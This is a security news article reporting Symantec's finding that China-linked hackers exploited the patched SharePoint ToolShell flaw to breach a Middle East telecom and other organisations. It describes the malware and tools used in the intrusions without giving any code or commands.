Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

APT

China-linked hackers exploit patched ToolShell flaw to breach Middle East telecom

China-based threat actors exploited ToolShell SharePoint flaw CVE-2025-53770 soon after its July patch. China-linked threat actors exploited the ToolShell SharePoint flaw vulnerability, tracked as CVE-2025-53770, to breach a telecommunications company in the Middle East after it was addressed by Microsoft in July 2025. “China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in […]

China-linked APT Salt Typhoon

China-based threat actors exploited ToolShell SharePoint flaw CVE-2025-53770 soon after its July patch.

China-linked threat actors exploited the ToolShell SharePoint flaw vulnerability, tracked as CVE-2025-53770, to breach a telecommunications company in the Middle East after it was addressed by Microsoft in July 2025.

“China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025.” reads the report published by Broadcom’s Symantec Threat Hunter Team.

According to Broadcom’s Symantec Threat Hunter Team, the attackers, linked to Glowworm (aka Earth Estries) and UNC5221, breached multiple targets, including two African government departments, two South American agencies, and a U.S. university. The hackers used tools like Zingdoor and KrustyLoader, and targeted SQL and Apache ColdFusion servers. A fake “mantec.exe” (masquerading as Symantec software) sideloaded malware. Additional victims include a state tech agency in Africa, a Middle Eastern ministry, and a European finance firm.

In July, Microsoft warned of a SharePoint zero-day vulnerability, tracked as CVE-2025-53770 (CVSS score of 9.8), which is under active exploitation. The vulnerability is a deserialization of untrusted data in on-premises Microsoft SharePoint Server, an unauthorized attacker could exploit the vulnerability to execute code over a network.

Microsoft later confirmed that three China-based groups, Budworm, Violet Typhoon aka (Sheathminer), and Storm-2603, had exploited ToolShell, with the latter deploying Warlock ransomware.

Also targeted were government departments in an African country, as well as government agencies in South America, a university in the U.S., as well as likely a state technology agency in an African country, a government department in the Middle East, and a finance company in a European country.

According to Broadcom’s Symantec Threat Hunter Team, the attacks involved the exploitation of CVE-2025-53770, a now-patched security flaw in on-premise SharePoint servers that could be used to bypass authentication and achieve remote code execution.

Malicious activity at a Middle Eastern telecom began on July 21, 2025, two days after ToolShell was patched, with attackers using a webshell and DLL sideloading to deploy backdoors and loaders. Zingdoor was sideloaded via a Trend Micro binary to collect data, transfer files and run commands. Threat actors sideloaded the ShadowPad backdoor using a BitDefender binary; it supports plug-in updates and has been used alongside ransomware. On July 25, attackers dropped the Rust-based KrustyLoader to fetch second-stage payloads, evade analysis and self-delete. Attackers also employed a variety of publicly available and living-off-the-land tools, including Certutil for file downloads, GoGo Scanner for network scanning, Revsocks for proxying traffic through firewalls, and Sysinternals’ Procdump, PowerSploit’s Minidump, and LsassDumper to extract LSASS process memory and steal credentials.

“An exploit for the Windows LSA Spoofing Vulnerability, CVE-2021-36942 (aka PetitPotam), was also executed.” continues the post. “PetitPotam is an exploitation technique that allows for a threat actor within a compromised network to steal credentials and authentication information from Windows Servers such as a Domain Controller to gain full control of the domain. This is likely used for lateral movement or privilege escalation.”

The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.

The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.

“There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors.” concludes the report. “The large number of apparent victims of this activity is also notable. This may indicate that the attackers were carrying out an element of mass scanning for the ToolShell vulnerability, before then carrying out further activity only on networks of interest.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ToolShell)